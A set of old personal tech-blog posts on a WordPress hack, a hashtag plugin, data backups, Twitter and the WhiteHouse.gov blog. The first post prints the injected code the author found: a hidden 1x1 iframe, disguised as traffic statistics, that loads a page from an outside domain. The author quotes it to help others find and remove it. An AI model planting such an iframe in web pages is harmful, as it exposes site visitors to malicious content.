annoying html injection in wordpress

two of my old posts at my geekblog Haibane.info dating from November 2007 had some injected HTML code in them. The injected code read as follows:

<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

I only became aware of it when Google flagged my archives for that month as “malicious”. Viewing source of the archives page revealed the hack – probably from some window of time in which I hadnt upgraded to the latest wordpress version.

To ensure you don’t have old posts in your archives with this exploit, just search your posts for the term “iframe”. Edit those posts and you’ll likely as not find similar code to above.

WordPress has come a long way in making upgrades easier with one click (though some people still run into problems on occasion). I think it would be better is WP had a incremental and automated upgrade process whereby whenever a security-related update was available, you could have it automatically install, just like you can set in Windows. Ideally, this would be controlled by a setting in the Dashboard to “turn on/off automatic security patches” and when enabled, would “register” your blog with the mothership at wordpress.org so that whenever a security patch is available, you get an automatic email to your admin email account notifying you, and when you next login to Dashboard the patch is automatically applied.

Tags to Hashtags #wp

I’ve written a new plugin for wordpress entitled “AHP Tags to Hashtags” for use with WordPress and WordPress MU. The plugin can be found for now at pastebin here, I will update when it’s been added to the official wordpress plugin repository.

The plugin appends the tags for each post to the post title in the RSS feed. For example, for a post titled “Awesome post” which is tagged with “Amazing, Awesome, Super awesome”, the RSS feed will show the post titles as “Awesome post #Amazing #Awesome #Superawesome”. Note that spaces in a tag are removed, and hash symbols (#) are prepended to each.

This plugin is useful primarily to bloggers who pipe their posts into Twitter. The post tags become Twitter hashtags. Since post tags and twitter hashtags are both a form of metadata, it is natural to simply and automatically reuse the one for the other.

Consider a blog post on the Iran election. Normally youd tag the post Iran and then when you tweet it, youd have to manually insert the twitter hashtag #iranelection. Now, you can simply tag the post iranelection (no # symbol) and it will automatically be hashtagged. Combined with a service like Twitterfeed, this plugin can greatly automate the process of piping relevant posts into the twitterverse.

Note that the plugin makes no attempt to check that the total length of the post title, including hashtags, falls within the 140-character limit imposed by Twitter.

At present the plugin has no options. The feature roadmap includes the following:
– add title character length checking
– toggle using tags or categories for conversion to hashtags
– let user decide whether to remove spaces in tags, or convert to underlines or other character

this is a pretty simple plugin so other feature requests are appreciated.

UPDATE: version 2.0 of the plugin is at pastebin here. This version no longer appends all tags, but only those already beginning with #. This way the blogger can selectively choose which tags they want converted into hashtags.

backups should be local, not to the cloud

One of the lessons of Friendfeed’s buyout by Facebook is that the cloud is not a good place for backup. In an era of the sub-$100 terabyte, the idea that the best place for our data should be anywhere other than right at home is a strange one. Cloud backup is useful as a meta-backup – for example, using Jungledisk and Amazon’s S3 service to backup your local backups – to guard against catastrophe, but should never be your primary repository.

For data like photos, this is pretty much a moot point, as everyone keeps their originals on their disk and uploads select photos to Flickr/Picasa etc (and at lower resolution than the originals). But for text, like blog posts and tweets, most people simply leave their content in the cloud – which includes leaving your wordpress database at your hosting provider rather than on your local disk. I haven’t yet found a good solution for local wordpress database backups but I have written previously about various backup strategies for twitter. Sarah Perez at RWW just did a piece on 10 ways to archive your tweets as well, but most of these are again cloud-based solutions. Marshall Kirkpatrick has a guide to using Google Reader along with Dave Winer’s new OPML tool to consolidate all your tweets and your friends’ tweets, but this isn’t a true backup solution either, as I point out in comments. The point however is as long as the data is in the cloud, it’s not really backed up – data wants to be imprisoned, not set free.

One Million Strong for @aplusk

Ashton Kutcher has done it – he has amassed one million followers. He’s using this publicity to donate mosquito nets to African children, but that’s just scratching the surface of what is possible.

Use your imagination.. what could he do, with his combination of celebrity and follower clout?

– he could raise money for a politician or cause
– he could single handedly launch a new brand or artist
– he can function as a one-man Digg or Slashdot effect

but more importantly, he can actually influence the public sphere. Consider that twitter users are the elite, early adopters and opinion makers. Ashton Kuther can now promote ideas to this elite. He’s a nexus of potential memes.

This is a landmark day. We don’t know how yet, but we will.

the WhiteHouse.gov blog: open government

Among the inaugural festivities, the official web site of the White House underwent a transition of its own. The site is now built around a central blog, which is a presidential first and a definite sign of the times. The first post lays out the purpose of the blog in detail:

Just like your new government, WhiteHouse.gov and the rest of the Administration’s online programs will put citizens first. Our initial new media efforts will center around three priorities:

Communication — Americans are eager for information about the state of the economy, national security and a host of other issues. This site will feature timely and in-depth content meant to keep everyone up-to-date and educated. Check out the briefing room, keep tabs on the blog (RSS feed) and take a moment to sign up for e-mail updates from the President and his administration so you can be sure to know about major announcements and decisions.

Transparency — President Obama has committed to making his administration the most open and transparent in history, and WhiteHouse.gov will play a major role in delivering on that promise. The President’s executive orders and proclamations will be published for everyone to review, and that’s just the beginning of our efforts to provide a window for all Americans into the business of the government. You can also learn about some of the senior leadership in the new administration and about the President’s policy priorities.

Participation — President Obama started his career as a community organizer on the South Side of Chicago, where he saw firsthand what people can do when they come together for a common cause. Citizen participation will be a priority for the Administration, and the internet will play an important role in that. One significant addition to WhiteHouse.gov reflects a campaign promise from the President: we will publish all non-emergency legislation to the website for five days, and allow the public to review and comment before the President signs it.

We’d also like to hear from you — what sort of things would you find valuable from WhiteHouse.gov? If you have an idea, use this form to let us know.

I think that the key here is that the WH website remains an irgan of Executive Branch government and is not just another blog in the standard, political/technology sense. The Communication role is of course obvious, but the Transparency and Participation are also key. Posting executive orders to the web site is a great start, and allowing the public to review and comment on legislation before it gets to the President’s desk is going to really open the legislative process to the public in an innovative and rigorous way.

It’s interesting to see that a lot of technology experts don’t seem to understand the civic context of the purpose of the WH blog. For example, Dave Winer complains,

The White House should send us to places where our minds will be nourished with new ideas, perspectives, places, points of view, things to do, ways we can make a difference. It must take risks, because that is reality — we’re all at risk now — hugely.

I don’t advocate a blogging host like the Obama campaign website. There are already plenty of places to host blogs. But I do want the White House to be a public space, where new thinking from all over the world meets other new thinking. A flow distributor. A two-way briefing book for the people and the government.

We need the minds of industry, education, health care, government, people from all walks of life, to connect. It doesn’t have to be whitehouse.gov, but why not, why wait?

I think this critique is unfair – partly because by publicizing executive orders and legislation, the public minds Dave talks about will have unprecedented access to the inner workings of the executive branch. By using the blog as a central distribution point, it already is the two-way briefing book he talks about.

What the WH site should not be, however, is a “public space”. The two-way flow needs to be of absolute highest SNR, which anyone who has spent even ten minutes online can attest is fundamentally incompatible with an open forum. The flow of information in both directions must be structured and controlled for maximum efficiency. If instead WH.gov becomes another home to the constant stream of garbage that spews over most public fora on the web, then one, the public will not be well-served by having to wade through the muck to find the information of genuine civic interest; and two, the very concept of an open and transparent portal into the inner workings of government will be discredited, and that we above all must not allow to happen. WH.gov is a courageous experiment and we must not let it fail.

It should be noted that the official WhiteHouse YouTube channel does allow comments. Since YouTube is not a government site, there isn’t the same requirement of decorum and civic sensibility, so a free-for-all can be tolerated.

Related – see Patrick Ruffini, Ars Technica, and TechCrunch for further comments on the WH.gov blog from a technological perspective. Also see Democracy Arsenal and Open Left for brief commentary from a political perspective. Finally, Read/Write Web has a nice 12-year retrospective on the evolution of the WH.gov website through the past several Presidencies.

Backing up your tweets

Twitter: over one billion tweets served. Actually, it’s probably more than that, since the count is from GigaTweet, an external service and not an official count. If we do the math, that comes out to:

140 chars per tweet x 1 byte per char x 10^9 tweets = 140 billion bytes = 130.4 GB worth of data

The 1 billion tweet mark took Twitter just over two years to achieve. Even assuming exponential growth, it’s hard to see Twitter’s raw tweet storage needs exceeding a terabyte ($109 and falling) in the next five years.

Of course, raw storage alone isn’t the whole story, since unlike the gigabytes of data on our home computers, the data on Twitter needs to be actively accessed and queried from the databases, which is a non-trivial task (as any regular user of Twitter over the past year can attest to). This is probably why Twitter has been enforcing a limit of 3200 tweets on users’ archives. The overhead on maintaining the archives beyond that is probably a threat to Twitter’s ability to maintain uptime and service reliability. The limit seems reasonable, since only the heaviest users will have reached that limit by now – I’ve been on twitter longer than most of the A-listers, and I tweet every blog entry I make from 5-6 different blogs, but I’m still only around 1200 tweets. Also, with far fewer followers (several hundred instead of thousands), I have only a handful of @replies compared to the firehose that folks like Darren (@problogger) or Scoble (@Scobleizer) see on their real-time clients. As a result, Twitter is more akin to an email/private messaging system for users like myself, rather than a real-time chatroom for the big users.

Still, even a casual Twitter user should be at least partially alarmed at the thought that their entire Twitter history is subject to arbitrary limits and no real guarantee of backup. As usual, it’s up to us to protect our own data, especially data in a walled garden (albeit one with handy RSS and API gates). Good user practices are the same whether we are using an online service or word processing at home, after all.

Here are just a few ways in which you can backup your tweets. I am sure there are more, so if you have any ideas I’ve not listed here, please share in comments!

Tweetake.com – This service lets you enter your username and download a CSV-format file of your followers, favorites, friends, and tweets. Unfortunately, @replies are not available for backup. It doesn’t save direct messages, either, but if you configure your twitter account to send you notification emails of direct messages, you can t least archive those separately. The CSV format is useful for archiving but not very user-friendly, though you could in principle import the data again into some other form.

Alex King’s Twitter Tools – this is a wordpress plugin that lets you manage your twitter account directly from your WordPress blog. The plugin lets you blog each tweet and/or tweet each blog post, and you can also generate a daily tweet digest as a blog post if you choose (and assign it to an arbitrary category). There’s no way to archive replies, DMs, or follower relationships.

Twitter itself supports RSS feeds, so you could slurp your own feed of replies and tweets using a feedreader and periodically back those up or even write them to disk. Also, users of third-party services like Socialthing, Friendfeed, or Ping.fm also have an alternate interface to Twitter that could potentially be used for backup. However, none of these provide comprehensive tweet archives either, only real-time mirroring.

Finally, Dave Winer has proposed a service/API that twitter clients can use to backup the RSS feed of a twitter account, but this is more of a technical solution of interest to twitter developers rather than end users.

UPDATE: Johann Burkard has written a great little tool in Java called (appropriately) TwitterBackup. It is a very simple piece of freeware that simply downloads all your tweets to a XML-format file saved locally. You specify a filename as you desire, and the tool is smart enough that if you give it the name of a file that already exists, it will only download newer tweets and append them to it rather than do a full download again. This incremental backup of tweets is ideal behavior – the only thing that this tool doesn’t do is preserve your follower/following relationships.

To be honest, none of these solutions are perfect, though Tweetake and Twitter Backup come closest. What would the ideal twitter backup tool look like? A few thoughts:

  1. be available as a desktop client or Adobe AIR application rather than yet another online service asking for your twitter password. ((Twitter’s implementation of OAuth or OpenID or some other authorization system is long overdue, by the way.))
  2. At first run, it should allow you to retrieve your entire (available) twitter history, including tweets, replies, and DMs.
  3. After the initial import, it should provide for periodic incremental backups of your tweets/replies/DMs, at an interval you specify (ideally, a five minute interval minimum).
  4. It should preserve your friend/follower relationships, and let you import everyone you follow onto any new twitter account or export all their RSS feeds as an OPML file.

What else? There’s definitely a niche out there for an enterprising developer to take Twitter’s API and create a tool focused on backup rather than yet another twitter client. Hopefully before I reach the 3200 tweet limit myself!